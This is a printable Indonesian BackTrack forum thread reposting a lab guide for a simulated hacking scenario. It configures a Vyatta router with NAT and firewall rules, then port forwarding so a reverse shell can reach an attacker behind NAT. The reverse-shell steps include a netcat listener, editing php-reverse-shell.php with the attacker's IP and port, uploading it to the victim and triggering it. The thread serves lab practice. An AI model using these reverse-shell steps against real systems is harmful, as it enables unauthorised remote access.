[ASK] metasploit beda jaringan - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Penetration Testing Os (https://www.indonesianbacktrack.or.id/forum/forum-170.html) +--- Forum: Backtrack (https://www.indonesianbacktrack.or.id/forum/forum-171.html) +---- Forum: BackTrack 5 (https://www.indonesianbacktrack.or.id/forum/forum-74.html) +----- Forum: Backtrack 5 Tanya Jawab (https://www.indonesianbacktrack.or.id/forum/forum-86.html) +----- Thread: [ASK] metasploit beda jaringan (/thread-1511.html) |
[ASK] metasploit beda jaringan - Junior Riau - 01-06-2012 mau tanya bro,, baru jalan2 ke tetangga sesama os pentest ketemu ini "use Vyatta in vmware to simulate Hacking from inside network scenario" ss nya ini info tetangga make blackbuntu bro,, ok lansung saja, m Image: R1 - Vyatta have 2 nic , eth0 simulate as Wan , eth1 are Lan Victim - Linux(u can use other operating system to create vuln image) Attacker - Blackbuntu Linux Vmware Configuration: 1. Create Vmware Team and add Lan segment in team, for Attacker-Network please read http://www.vmware.com/support/ws5/doc/ws_team_create_wizard.html for more information how to create team in vmware 2. Add Vyatta image to team, set eth0 connect to NAT, eth1 connect to Lan segment in team 3. Add Blackbuntu to to team, set network interface (in my case are eth0) connect to eth1 3. Vuln Image (Victim) set network connect to NAT Vyatta Configuration: set hostname and ip address, etc.. set system host-name R2 set system domain-name blackbuntu.lan set interfaces ethernet eth0 address 172.16.14.11/24 set system name-server 172.16.14.2 set system gateway-address 172.16.14.2 set interfaces ethernet eth1 address 192.168.1.1/24 set service ssh Configuring DHCP Server: set service dhcp-server shared-network-name ETH1_POOL subnet 192.168.1.0/24 start 192.168.1.20 stop 192.168.1.200 set service dhcp-server shared-network-name ETH1_POOL subnet 192.168.1.0/24 default-router 192.168.1.1 set service dhcp-server shared-network-name ETH1_POOL subnet 192.168.1.0/24 dns-server 172.16.14.2 ## Configuring NAT set service nat rule 1 source address 192.168.1.0/24 set service nat rule 1 outbound-interface eth0 set service nat rule 1 type masquerade ## Configuring Firewall: ## Define a firewall rule set: set firewall name ALLOW_ESTABLISHED set firewall name ALLOW_ESTABLISHED rule 10 set firewall name ALLOW_ESTABLISHED rule 10 action accept set firewall name ALLOW_ESTABLISHED rule 10 state ## Apply the rule set to an interface: set interfaces ethernet eth0 firewall in name ALLOW_ESTABLISHED set interfaces ethernet eth0 firewall local name ALLOW_ESTABLISHED commit save After commit and save, at this point you should ping and can connect from Blackbuntu(Attacker) to Victim (and internet too) ### Config port forward ### Scenario/Question: When we hack into victim, if we want to reverse shell back to Blackbuntu box that locate at inside network behind NAT,What can we do? Solution/Answer: Configure DNAT rules with port destination and firewall destination rules. Example: on Blackbuntu box we listening on port 80 for incoming connection with command $nc -lvvp 80 on vyatta should config DNAT like this: NAT RULES: set service nat rule 10 type destination set service nat rule 10 protocol tcp set service nat rule 10 inside-address port 80 set service nat rule 10 inside-address address 192.168.1.52 set service nat rule 10 inbound-interface eth0 set service nat rule 10 destination port 80 commit FIREWALL RULES: set firewall name ALLOW_ESTABLISHED rule 20 action accept set firewall name ALLOW_ESTABLISHED rule 20 protocol tcp set firewall name ALLOW_ESTABLISHED rule 20 destination address 192.168.1.52 set firewall name ALLOW_ESTABLISHED rule 20 destination port 80 set firewall name ALLOW_ESTABLISHED rule 20 state new enable set firewall name ALLOW_ESTABLISHED rule 20 state established enable set firewall name ALLOW_ESTABLISHED rule 20 state related enable set interfaces ethernet eth0 firewall in name ALLOW_ESTABLISHED commit save Forward port 4321 NAT RULES: set service nat rule 20 type destination set service nat rule 20 protocol tcp set service nat rule 20 inside-address port 4321 set service nat rule 20 inside-address address 192.168.1.52 set service nat rule 20 inbound-interface eth0 set service nat rule 20 destination port 4321 commit FIREWALL RULES: set firewall name ALLOW_ESTABLISHED rule 30 action accept set firewall name ALLOW_ESTABLISHED rule 30 protocol tcp set firewall name ALLOW_ESTABLISHED rule 30 destination address 192.168.1.52 set firewall name ALLOW_ESTABLISHED rule 30 destination port 4321 set firewall name ALLOW_ESTABLISHED rule 30 state new enable set firewall name ALLOW_ESTABLISHED rule 30 state established enable set firewall name ALLOW_ESTABLISHED rule 30 state related enable set interfaces ethernet eth0 firewall in name ALLOW_ESTABLISHED commit save Example i edit php-reverse-shell.php and change line: $ip = '172.16.14.11'; // CHANGE THIS $port = 4321; // CHANGE THIS upload to victim, then on Blackbuntu box i browse to htptp://172.16.14.129/php-reverse-shell.php and run netcat with command nc -lvvp 4321 PHP Code: If we use msfpayload to create evil file we use command: nah itu katanya kalo pake metasploit.. ane sedang dalam percobaan bro bagi abang" kakak" adek" pokonya yang di forum nih lah yang berniat coba hasilnya posting dimari lagi yah biar jadi pembelajaran juga [/quote] kelupaann source nya http://www.blackbuntu.com/node/41 |